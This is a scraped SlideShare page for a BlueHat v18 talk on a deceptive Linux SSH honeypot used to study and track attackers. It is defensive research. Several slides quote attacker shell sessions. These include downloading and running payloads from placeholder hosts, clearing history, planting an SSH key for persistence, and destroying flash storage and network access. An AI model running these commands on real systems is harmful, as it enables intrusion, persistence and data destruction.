Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
SlideShare a Scribd company logo

BlueHat v18 || The matrix has you - protecting linux using deception

Ross Bevington, Microsoft In ‘The Matrix’ sentient machines subdue the population by developing a highly sophisticated simulation. High interaction honeypots are a lot like The Matrix, designed to convince an attacker to execute an attack so we can monitor them. But these honeypots are flawed! Attackers are continually adapting in order to evade our defenses - meaning that it’s often not enough to just set up a honeypot and watch the results roll in. Is a new approach better? Did you know that 40% of IaaS VMs in Azure are Linux? For Microsoft to protect itself and its customers Linux is a priority. At MSTIC we’ve developed a new type of Linux honeypot that allows us to deceive and control the behavior of an attacker. We are using this to understand the person behind the attack, examining them as they examine us. Using these techniques, we are able to better track the person behind the threat, build better protections and ultimately protect more Linux users - whether they are using Azure or not. In this presentation I’ll show some of the successes of running a Matrix like environment, failures where a glitch was spotted as well as deception approaches that could be applied to other domains. Finally I’ll show how easy it is to leverage Azure’s big data capabilities to build and ultimately query all this data at scale as well as how you can immediately reap the benefits of this work by connecting your Linux box to Azure Security Center.

1 of 50
Download to read offline

1

BlueHat v18 || The matrix has you - protecting linux using deception

2

BlueHat v18 || The matrix has you - protecting linux using deception

3

APT Nation state Automated Bots ‘Script kiddy’ Organised groups Crime/hacktivism High impact, low frequency EAPT High frequency, arguably also high impact Generally easily rebuked via Software updates& firewalletc FT Analysts, red teaming

4

1500 identical commands All the commands typed in less than 500 times Real people The biggest bots MIRAI etc Raspberry PI Botnet attacks

5

Anatomy of a Linux attack 1. Exploit and immediate action 2. Brute force and immediate action 3. Brute force creds…move to different infrastructure…and action • Coin mining is extremely popular

6

BlueHat v18 || The matrix has you - protecting linux using deception

7

What is deception? • Emerging area of InfoSec • Usually centred around the human behind the attack • Has actually been around a long time

8

Honeypots • Standard technique to study attackers for many years • Low – dumb listener / just log network connections • Medium – emulate key services • High – actual OS

9

Honeypots are broken! • Relatively easy to spot a honeypot • Lots of ports, Shodan, odd routes to the Internet • Honeypots tell you about an attack but not the attacker • Do we care about the attack or the attacker? • Deception is usually used for alerting, can we use it for tracking?

10

Honeypots & the fog of war Only success

11

Enter the hybrid Only success Extreme cases Only failure Traditional honeypots

12

Hybrid • Provide an environment that appears to be legitimate • Take the best of low / medium interaction honeypots • Add faults to cause an attacker to take alternative actions • Faults are targeted to collect information we want • New IPs, files, URLs etc • Combine with traditional honeypots to see the outcome of an attack

13

BlueHat v18 || The matrix has you - protecting linux using deception

14

BlueHat v18 || The matrix has you - protecting linux using deception

15

BlueHat v18 || The matrix has you - protecting linux using deception

16

BlueHat v18 || The matrix has you - protecting linux using deception

17

BlueHat v18 || The matrix has you - protecting linux using deception

18

These are your tools • Lies • Persuasion • Mimicry • Distraction • Traps & Decoys • Lures & Breadcrumbs • Everything society told you not to do!

19

Threat model • Not bots • Just need a good simulation • Not state / APT • Simulation won’t be good enough • High end actors are targeted in their attacks, won’t find us etc • Middle ground • Real people, script kiddies

20

Honeypot Attacker Real systems

21

BlueHat v18 || The matrix has you - protecting linux using deception

22

How is it implemented? • 100% C# SSH implementation with Bash/Linux simulator on top • Can PuTTY, SFTP & SCP, Docker, MySQL (and more) • Logs all TCP/SYN for trends 3 attemptsto login, successful loginsare cached Kernel & OS is randomised Results are canned or coded in C# 100% simulation, nothing is ever executed

23

Deployment Processing Results Log Analytics Virus Total Internal sources and tools Japan UK & EU West USA Central USA West Threat intel feeds MSRC VMs on Azure and other providers

24

Format data as JSON, Code on GitHub to upload Query in NRT

25

Listening carefully • SSH protocol is complex • It’s remote access, it’s a proxy, it’s file transfer • Bit like SSL/TLS, you start by negotiating crypto • Client/server say what algorithms they support • Messages are passed from client to server and responded to • Lots of extensions (such as PuTTY ones)

26

What do we get by listening hard? • The client sends machine specific data to the server • ciphers, agent strings, supported modes, terminal size • Environment variables (we see locale’s) ^ really • The first packet comes from the attackers machines • This has some magic fields: TTL, Window size, TCP timestamp

27

And the point of all this? • Can use sources of entropy to build a fingerprint & track across infrastructure • We can work out • Attackers real OS • How deep they are in a network • How long their machine has been up (highly unreliable) • Can compare real OS to the SSH agent banner • Maybe even look up identity! • https://github.com/FiloSottile/whosthere

28

BlueHat v18 || The matrix has you - protecting linux using deception

29

Hybrid theory • We want URLs • Need to balance enumeration with attacker expectations • Small wins & the rule of three • Include reason why! user@exploited:~$ wget 374.53.15.95/test.jpg –O a.out Resolving baddomain.com (baddomain.com)... failed: Name or service not known. user@exploited:~$ curl 374.53.15.95/test.jpg curl: (22) The requested URL returned error: 403 Forbidden user@exploited:~$ curl newdomain.com/test.jpg user@exploited:~$ chmod +x a.out

30

Enrich existing data • A lot of malware is uploaded in ZIP format • ZIP spec doesn’t contain much machine specific metadata • TAR does! user@exploited:~$ unzip malware.zip bash: unzip: command not found user@exploited:~$ tar tar: You must specify one of the `-Acdtrux' or `--test-label' options Try `tar --help' or `tar --usage' for more information.

31

Tracking stolen data • When attackers break in they nose around • Might be looking for more creds • Might be looking for data to steal • Tokens used for years to signal when an attack has started • https://canarytokens.org/generate • We know we are under attack

32

How does it work? AWS credentials using them triggers an email alert Visiting the URL triggers an email alert Hosting real files on the honeypot

33

BlueHat v18 || The matrix has you - protecting linux using deception

34

BlueHat v18 || The matrix has you - protecting linux using deception

35

BlueHat v18 || The matrix has you - protecting linux using deception

36

BlueHat v18 || The matrix has you - protecting linux using deception

37

user@billingserver:~$ uname –a Linux billingserver 4.15.0-1013 user@billingserver:~$ cat link.txt This is the link to the temp mobile site, creds paydbadmin:!pP543fddgZ@ Was so long I had to shorten it! DO NOT SHARE AROUND!!! https://bit.ly/2oWZ2aL user@billingserver:~$ wget XXXXXXXX.altervista.org/scan.jpg –O a.out Resolving altervista.org (altervista.org)... failed: Name or service not known. user@billingserver:~$ wget http://111.222.333.444/scan.jpg Resolving 111.222.333.444 (111.222.333.444)... failed: Name or service not known. user@billingserver:~$ history -c user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.zip user@billingserver:~$ unzip source.zip unzip: cannot find libzip1.so - found libgz.so libbz.so user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.tgz user@billingserver:~$ tar xvf && cd source user@billingserver:~$ gcc main.c && ./a.out Segmentation fault user@billingserver:~$ Broadcast message from root@exploited The system is shutting down in 1m due to UPS failure user@billingserver:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAA==' >> ~/.ssh/authorized_keys ALL USERS MUST AGREE TO THE TERMS & CONDITIONS user@billingserver:~$ chmod +x a.out && .a.out

38

BlueHat v18 || The matrix has you - protecting linux using deception

39

BlueHat v18 || The matrix has you - protecting linux using deception

40

From DigitalOcean to Romania a real attack mounted by a real person Logs in from 198.199.70.152 & tries to installcoinminer downloads‘link.txt’ Visits link from 5.12.130.162 (IP is clean) I see an attacker visit the link from a RomanianIP I see info on an attack launchedfrom a DigitalOceanIP & the Monero mining account

41

People making mistakes

42

BlueHat v18 || The matrix has you - protecting linux using deception

43

BlueHat v18 || The matrix has you - protecting linux using deception

44

Attackers proxying

45

A glitch in the matrix! Attacker of the month Racist profanityremoved!

46

A glitch in the matrix! user@exploited:~$ lscpu … user@exploited:~$ nproc 8 user@exploited:~$ clear user@exploited:~$ sudo su root@:~$ cat /etc/*-release cat: /etc/*-release: No such file or directory user@exploited:~$ sudo su root@:~$ cat /proc/mounts root@:~$ cat /dev/urandom | mtd_write mtd0 - 0 32768 root@:~$ iproute del default root@:~$ iptables -A INPUT -j DROP root@:~$ reboot

47

‘White hat’ tries to fix my box • Spare a thought for the attacker who ran ~60 commands and spent 10m trying to fix the HP’s DNS resolver!

48

Analysts developnew detections on this data

49

BlueHat v18 || The matrix has you - protecting linux using deception

50

tl;dr • We use deception technology to protect customers • Understand the attacker as well as the attack • Use Azure Security Centre to start benefiting • Big data? Use Log Analytics and Kusto • Ross.Bevington@Microsoft.com

More Related Content

BlueHat v18 || The matrix has you - protecting linux using deception

  • 3. APT Nation state Automated Bots ‘Script kiddy’ Organised groups Crime/hacktivism High impact, low frequency EAPT High frequency, arguably also high impact Generally easily rebuked via Software updates& firewalletc FT Analysts, red teaming
  • 4. 1500 identical commands All the commands typed in less than 500 times Real people The biggest bots MIRAI etc Raspberry PI Botnet attacks
  • 5. Anatomy of a Linux attack 1. Exploit and immediate action 2. Brute force and immediate action 3. Brute force creds…move to different infrastructure…and action • Coin mining is extremely popular
  • 7. What is deception? • Emerging area of InfoSec • Usually centred around the human behind the attack • Has actually been around a long time
  • 8. Honeypots • Standard technique to study attackers for many years • Low – dumb listener / just log network connections • Medium – emulate key services • High – actual OS
  • 9. Honeypots are broken! • Relatively easy to spot a honeypot • Lots of ports, Shodan, odd routes to the Internet • Honeypots tell you about an attack but not the attacker • Do we care about the attack or the attacker? • Deception is usually used for alerting, can we use it for tracking?
  • 10. Honeypots & the fog of war Only success
  • 11. Enter the hybrid Only success Extreme cases Only failure Traditional honeypots
  • 12. Hybrid • Provide an environment that appears to be legitimate • Take the best of low / medium interaction honeypots • Add faults to cause an attacker to take alternative actions • Faults are targeted to collect information we want • New IPs, files, URLs etc • Combine with traditional honeypots to see the outcome of an attack
  • 18. These are your tools • Lies • Persuasion • Mimicry • Distraction • Traps & Decoys • Lures & Breadcrumbs • Everything society told you not to do!
  • 19. Threat model • Not bots • Just need a good simulation • Not state / APT • Simulation won’t be good enough • High end actors are targeted in their attacks, won’t find us etc • Middle ground • Real people, script kiddies
  • 22. How is it implemented? • 100% C# SSH implementation with Bash/Linux simulator on top • Can PuTTY, SFTP & SCP, Docker, MySQL (and more) • Logs all TCP/SYN for trends 3 attemptsto login, successful loginsare cached Kernel & OS is randomised Results are canned or coded in C# 100% simulation, nothing is ever executed
  • 23. Deployment Processing Results Log Analytics Virus Total Internal sources and tools Japan UK & EU West USA Central USA West Threat intel feeds MSRC VMs on Azure and other providers
  • 24. Format data as JSON, Code on GitHub to upload Query in NRT
  • 25. Listening carefully • SSH protocol is complex • It’s remote access, it’s a proxy, it’s file transfer • Bit like SSL/TLS, you start by negotiating crypto • Client/server say what algorithms they support • Messages are passed from client to server and responded to • Lots of extensions (such as PuTTY ones)
  • 26. What do we get by listening hard? • The client sends machine specific data to the server • ciphers, agent strings, supported modes, terminal size • Environment variables (we see locale’s) ^ really • The first packet comes from the attackers machines • This has some magic fields: TTL, Window size, TCP timestamp
  • 27. And the point of all this? • Can use sources of entropy to build a fingerprint & track across infrastructure • We can work out • Attackers real OS • How deep they are in a network • How long their machine has been up (highly unreliable) • Can compare real OS to the SSH agent banner • Maybe even look up identity! • https://github.com/FiloSottile/whosthere
  • 29. Hybrid theory • We want URLs • Need to balance enumeration with attacker expectations • Small wins & the rule of three • Include reason why! user@exploited:~$ wget 374.53.15.95/test.jpg –O a.out Resolving baddomain.com (baddomain.com)... failed: Name or service not known. user@exploited:~$ curl 374.53.15.95/test.jpg curl: (22) The requested URL returned error: 403 Forbidden user@exploited:~$ curl newdomain.com/test.jpg user@exploited:~$ chmod +x a.out
  • 30. Enrich existing data • A lot of malware is uploaded in ZIP format • ZIP spec doesn’t contain much machine specific metadata • TAR does! user@exploited:~$ unzip malware.zip bash: unzip: command not found user@exploited:~$ tar tar: You must specify one of the `-Acdtrux' or `--test-label' options Try `tar --help' or `tar --usage' for more information.
  • 31. Tracking stolen data • When attackers break in they nose around • Might be looking for more creds • Might be looking for data to steal • Tokens used for years to signal when an attack has started • https://canarytokens.org/generate • We know we are under attack
  • 32. How does it work? AWS credentials using them triggers an email alert Visiting the URL triggers an email alert Hosting real files on the honeypot
  • 37. user@billingserver:~$ uname –a Linux billingserver 4.15.0-1013 user@billingserver:~$ cat link.txt This is the link to the temp mobile site, creds paydbadmin:!pP543fddgZ@ Was so long I had to shorten it! DO NOT SHARE AROUND!!! https://bit.ly/2oWZ2aL user@billingserver:~$ wget XXXXXXXX.altervista.org/scan.jpg –O a.out Resolving altervista.org (altervista.org)... failed: Name or service not known. user@billingserver:~$ wget http://111.222.333.444/scan.jpg Resolving 111.222.333.444 (111.222.333.444)... failed: Name or service not known. user@billingserver:~$ history -c user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.zip user@billingserver:~$ unzip source.zip unzip: cannot find libzip1.so - found libgz.so libbz.so user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.tgz user@billingserver:~$ tar xvf && cd source user@billingserver:~$ gcc main.c && ./a.out Segmentation fault user@billingserver:~$ Broadcast message from root@exploited The system is shutting down in 1m due to UPS failure user@billingserver:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAA==' >> ~/.ssh/authorized_keys ALL USERS MUST AGREE TO THE TERMS & CONDITIONS user@billingserver:~$ chmod +x a.out && .a.out
  • 40. From DigitalOcean to Romania a real attack mounted by a real person Logs in from 198.199.70.152 & tries to installcoinminer downloads‘link.txt’ Visits link from 5.12.130.162 (IP is clean) I see an attacker visit the link from a RomanianIP I see info on an attack launchedfrom a DigitalOceanIP & the Monero mining account
  • 45. A glitch in the matrix! Attacker of the month Racist profanityremoved!
  • 46. A glitch in the matrix! user@exploited:~$ lscpu … user@exploited:~$ nproc 8 user@exploited:~$ clear user@exploited:~$ sudo su root@:~$ cat /etc/*-release cat: /etc/*-release: No such file or directory user@exploited:~$ sudo su root@:~$ cat /proc/mounts root@:~$ cat /dev/urandom | mtd_write mtd0 - 0 32768 root@:~$ iproute del default root@:~$ iptables -A INPUT -j DROP root@:~$ reboot
  • 47. ‘White hat’ tries to fix my box • Spare a thought for the attacker who ran ~60 commands and spent 10m trying to fix the HP’s DNS resolver!
  • 50. tl;dr • We use deception technology to protect customers • Understand the attacker as well as the attack • Use Azure Security Centre to start benefiting • Big data? Use Log Analytics and Kusto • Ross.Bevington@Microsoft.com